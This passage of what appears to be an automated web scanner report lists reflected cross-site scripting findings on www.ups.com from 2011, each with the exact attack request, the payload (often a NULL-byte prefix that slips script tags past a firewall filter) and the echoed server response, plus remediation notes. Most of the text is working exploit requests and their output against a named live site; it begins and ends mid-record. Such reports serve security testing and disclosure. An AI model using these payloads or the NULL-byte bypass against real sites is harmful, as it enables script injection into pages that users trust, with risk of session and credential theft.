//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.147. https://www.ups.com/myWorkspace/wspref [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd059"><script>alert(1)</script>d77ec82d71c was submitted in the loc parameter. This input was echoed as cd059"><script>alert(1)</script>d77ec82d71c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/wspref?loc=en_US%00cd059"><script>alert(1)</script>d77ec82d71c&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd059"><script>alert(1)</script>d77ec82d71c&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd059%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bd77ec82d71c%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.148. https://www.ups.com/myWorkspace/wspref [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0091f4c</script><script>alert(1)</script>899bae98079 was submitted in the loc parameter. This input was echoed as 91f4c</script><script>alert(1)</script>899bae98079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/wspref?loc=en_US%0091f4c</script><script>alert(1)</script>899bae98079&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script><script>alert(1)</script>899bae98079';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script>
...[SNIP]...

1.149. https://www.ups.com/myups/addresses [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 88949%0abe6574ffdd3 was submitted in the REST URL parameter 2. This input was echoed as 88949
be6574ffdd3
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myups/addresses88949%0abe6574ffdd3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myups/addresses88949
be6574ffdd3
?appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addres
...[SNIP]...

1.150. https://www.ups.com/myups/addresses [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94431'%3b510e598237 was submitted in the REST URL parameter 2. This input was echoed as 94431';510e598237 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myups/addresses94431'%3b510e598237 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44464


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
actionUrl = "/one-to-one/l
...[SNIP]...

1.151. https://www.ups.com/myups/addresses [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da4"%20a%3db%20f7ea2fc3fef was submitted in the REST URL parameter 2. This input was echoed as e5da4" a=b f7ea2fc3fef in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addressese5da4"%20a%3db%20f7ea2fc3fef HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44559


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myups/addressese5da4" a=b f7ea2fc3fef?appid=IMS">
...[SNIP]...

1.152. https://www.ups.com/myups/addresses [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d4c38'-alert(1)-'57345105a30 was submitted in the loc parameter. This input was echoed as d4c38'-alert(1)-'57345105a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/addresses?loc=en_US%00d4c38'-alert(1)-'57345105a30&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
05a30&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
actionUrl = "/one-to-on
...[SNIP]...

1.153. https://www.ups.com/myups/addresses [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1aca"><script>alert(1)</script>b1110c7fd4f was submitted in the loc parameter. This input was echoed as f1aca"><script>alert(1)</script>b1110c7fd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/addresses?loc=en_US%00f1aca"><script>alert(1)</script>b1110c7fd4f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_f1aca"><script>alert(1)</script>b1110c7fd4f&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_f1aca%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb1110c7fd4f%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.154. https://www.ups.com/myups/addresses [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00ec2ae</script><script>alert(1)</script>5826b439ddd was submitted in the loc parameter. This input was echoed as ec2ae</script><script>alert(1)</script>5826b439ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/addresses?loc=en_US%00ec2ae</script><script>alert(1)</script>5826b439ddd&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae</script><script>alert(1)</script>5826b439ddd&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae
...[SNIP]...

1.155. https://www.ups.com/myups/forgotpassword [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/forgotpassword

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c39c0"><script>alert(1)</script>9c8c2a16b70 was submitted in the loc parameter. This input was echoed as c39c0"><script>alert(1)</script>9c8c2a16b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/forgotpassword?loc=en_US%00c39c0"><script>alert(1)</script>9c8c2a16b70 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_c39c0"><script>alert(1)</script>9c8c2a16b70.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.156. https://www.ups.com/one-to-one/forgot [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /one-to-one/forgot

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002da2b"><script>alert(1)</script>1d4bc2b1a72 was submitted in the loc parameter. This input was echoed as 2da2b"><script>alert(1)</script>1d4bc2b1a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /one-to-one/forgot?loc=en_US%002da2b"><script>alert(1)</script>1d4bc2b1a72&WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_2da2b"><script>alert(1)</script>1d4bc2b1a72.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.157. https://www.ups.com/one-to-one/register [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /one-to-one/register

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0062e6e"><script>alert(1)</script>1d53815f05 was submitted in the loc parameter. This input was echoed as 62e6e"><script>alert(1)</script>1d53815f05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /one-to-one/register?sysid=myups&lang=en&langc=US&loc=en_US%0062e6e"><script>alert(1)</script>1d53815f05 HTTP/1.1
Host: www.ups.com
Connection: keep-alive
Referer: http://www.ups.com/?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:17:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Keep-Alive: timeout=65
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 32223


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_62e6e"><script>alert(1)</script>1d53815f05.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.158. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1c2b'%3b9f6735610f2 was submitted in the REST URL parameter 1. This input was echoed as f1c2b';9f6735610f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osaf1c2b'%3b9f6735610f2/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
Supplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
actionU
...[SNIP]...

1.159. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93460"%20a%3db%2031fb5663470 was submitted in the REST URL parameter 1. This input was echoed as 93460" a=b 31fb5663470 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa93460"%20a%3db%2031fb5663470/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa93460" a=b 31fb5663470/orderSupplies?appid=WBSO">
...[SNIP]...

1.160. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ba640%0a7ba9ebff89 was submitted in the REST URL parameter 1. This input was echoed as ba640
7ba9ebff89
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osaba640%0a7ba9ebff89/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
